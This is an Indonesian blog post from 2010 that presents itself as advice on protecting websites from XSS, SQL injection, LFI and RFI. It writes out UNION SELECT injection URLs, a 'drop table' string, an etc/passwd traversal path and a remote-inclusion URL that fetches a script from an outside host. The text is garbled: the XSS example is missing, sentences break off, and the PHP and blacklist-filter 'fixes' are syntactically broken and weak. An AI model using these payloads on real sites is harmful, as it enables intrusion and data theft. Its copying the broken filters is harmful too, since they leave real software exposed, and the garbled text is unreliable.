di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.
http://www.situs.net/find.php?all=”>function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.
Contoh:
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..
http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
perintah version().$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.
http://www.situs.net/page.php?page=../../../../../ etc/passwd < contoh LFI
http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI
Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}
[-] The big Family of :
[-] M0slem Hax0r – Echo – Indonesian Coder – Jasakom – Indonesian Hackers – Malang Cyber Crew
[-] ManadoCoding – Devilzc0de – Yogyacarderlink – Xcode – Hacker Newbie
[-] Klix ITN Malang – Kolam (Komunitas Linux Arek Malang)
0 komentar to "Protecting Website From Common Attacks"
form input java sript
This free script provided by fi_bl
Blog Archive
-
▼
2010
(16)
-
▼
Oktober
(14)
-
▼
Okt 09
(11)
- Widget Untuk Mempercantik Blog
- mengembalikan password admin
- XP COMMAND
- tampilkan pesan pada saat starup
- login windows sebagai system
- mempercepat internet dengan putty
- software
- membuka hak akses drive administrator yang di protek
- Hacking Database Dengan Schemafuzzy
- 12 Free Keylogger & PC Monitor Win7
- Protecting Website From Common Attacks
-
▼
Okt 09
(11)
-
▼
Oktober
(14)





Posting Komentar